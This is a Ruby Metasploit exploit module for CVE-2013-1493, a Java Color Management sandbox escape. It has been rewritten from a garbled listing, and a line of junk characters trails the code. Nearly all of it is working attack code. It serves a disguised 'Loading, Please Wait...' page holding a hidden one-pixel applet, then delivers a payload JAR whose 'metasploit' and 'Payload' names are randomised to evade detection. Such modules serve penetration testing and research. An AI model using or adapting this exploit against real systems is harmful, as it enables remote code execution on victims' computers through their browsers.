##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
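# Framework core and the Rex support library (HTTP server, JAR builder, rand_text_* helpers).
# The listing had these with typographic quotes and interleaved junk, which is not valid Ruby.
require 'msf/core'
require 'rex'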
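# Browser exploit for CVE-2013-1493 (Java CMM / Color Management).
#
# The listing was garbled (typographic quotes, interleaved junk text, the
# 'DefaultTarget' key displaced out of the info hash into on_request_uri, the
# 'Author' array missing its opening bracket). This is the same module with
# the syntax restored, the four identical class-file reads folded into one
# helper, the JAR construction split out of the request handler, and the
# length-sensitive bytecode renames documented.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page is a bare <applet> tag with no script, so Browser
  # Autopwn must not expect JavaScript fingerprinting from this module.
  autopwn_info({ :javascript => false })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # Index 1 is the Windows native-payload target.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the pre-compiled applet classes shipped under data/exploits and
  # randomises the name of the entry class before the HTTP server is started
  # by super.
  def setup
    @init_class           = read_exploit_class("Init.class")
    @leak_class           = read_exploit_class("Leak.class")
    @buffered_image_class = read_exploit_class("MyBufferedImage.class")
    @color_space_class    = read_exploit_class("MyColorSpace.class")

    # The new name must be exactly as long as "Init": it is patched straight
    # into compiled bytecode, where each constant-pool UTF8 entry carries an
    # explicit length prefix, so a longer or shorter replacement would corrupt
    # the class file. gsub! rewrites every occurrence of the string in the
    # file (the class name and, presumably, a SourceFile attribute if present).
    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # HTTP handler. Serves the applet page for the resource root, the exploit
  # JAR for any *.jar request, and redirects everything else to the root.
  #
  # @param cli the connected client
  # @param request [Rex::Proto::Http::Request] the client's request
  def on_request_uri(cli, request)
    # The URI is client-controlled; it is only echoed to the operator console
    # here and is never used to build a path or a response body.
    print_status("handling request for #{request.uri}")

    # \z instead of $ so the match is against the true end of the URI rather
    # than a line end; equivalent for any URI the HTTP parser can hand us.
    case request.uri
    when /\.jar\z/i
      send_jar(cli)
    when /\/\z/
      # Framework helper; presumably rebuilds the payload for this client so
      # the JAR requested next is built around it. A local named `payload`
      # would shadow the payload method for the rest of this scope, so the
      # result is only tested, not kept.
      unless regenerate_payload(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Returns the landing page: a one-line document embedding the applet.
  # Both interpolated values come from rand_text_alpha (letters only), so
  # no attribute escaping is required, and the random JAR name is matched
  # by the *.jar route whatever its value.
  #
  # @return [String] the HTML body
  def generate_html
    jar_name = rand_text_alpha(8)
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{jar_name}.jar" code="#{@init_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one of the module's compiled applet classes as a binary string.
  #
  # @param name [String] file name inside data/exploits/cve-2013-1493
  # @return [String] raw class-file bytes
  def read_exploit_class(name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name)
    File.binread(path)
  end

  # Builds the exploit JAR around the current payload and sends it to the
  # client as application/octet-stream.
  #
  # @param cli the connected client
  def send_jar(cli)
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file("Leak.class", @leak_class)
    jar.add_file("MyBufferedImage.class", @buffered_image_class)
    jar.add_file("MyColorSpace.class", @color_space_class)

    # Rename the framework's telltale "metasploit" package and "Payload"
    # class throughout the archive, in entry names and bytecode alike.
    # Replacements are length-preserving for the same constant-pool reason as
    # the Init rename in setup ("payload".length == "Payload".length). The
    # applet classes are added before this pass so that any references they
    # hold to those names are rewritten consistently with the payload classes.
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str    = rand_text_alpha("payload".length)
    jar.entries.each do |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    end

    # Kept after the rename pass, as in the published module, so the manifest
    # is generated from the final entry names.
    jar.build_manifest
    send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
  end
end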
5 ?( A- I: A( c' ]- D |